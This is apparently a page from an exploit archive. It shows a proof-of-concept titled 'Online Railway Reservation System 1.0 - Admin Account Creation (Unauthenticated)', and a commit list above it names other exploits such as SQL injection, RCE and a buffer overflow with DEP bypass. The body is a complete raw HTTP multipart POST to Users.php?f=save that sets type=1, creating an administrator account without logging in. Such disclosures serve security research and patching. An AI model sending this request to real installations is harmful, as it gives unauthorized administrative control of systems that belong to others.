
8 changes to exploits/shellcodes VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass) CoreFTP Server build 725 - Directory Traversal (Authenticated) HTTP Commander 3.1.9 - Stored Cross Site Scripting (XSS) Online Railway Reservation System 1.0 - 'id' SQL Injection (Unauthenticated) Online Railway Reservation System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated) Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated) Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)
40 lines
No EOL
1.6 KiB
Text
40 lines
No EOL
1.6 KiB
Text
#Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)
|
|
#Date: 07/01/2022
|
|
#Exploit Author: Zachary Asher
|
|
#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
|
|
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
|
|
#Version: 1.0
|
|
#Tested on: Online Railway Reservation System 1.0
|
|
|
|
=====================================================================================================================================
|
|
Account Creation
|
|
=====================================================================================================================================
|
|
POST /orrs/classes/Users.php?f=save HTTP/1.1
|
|
Host: localhost
|
|
Accept: */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036
|
|
Content-Length: 602
|
|
|
|
-----------------------------344736580936503100812880815036
|
|
Content-Disposition: form-data; name="firstname"
|
|
|
|
testing
|
|
-----------------------------344736580936503100812880815036
|
|
Content-Disposition: form-data; name="lastname"
|
|
|
|
testing
|
|
-----------------------------344736580936503100812880815036
|
|
Content-Disposition: form-data; name="username"
|
|
|
|
testing
|
|
-----------------------------344736580936503100812880815036
|
|
Content-Disposition: form-data; name="password"
|
|
|
|
testing
|
|
-----------------------------344736580936503100812880815036
|
|
Content-Disposition: form-data; name="type"
|
|
|
|
1 |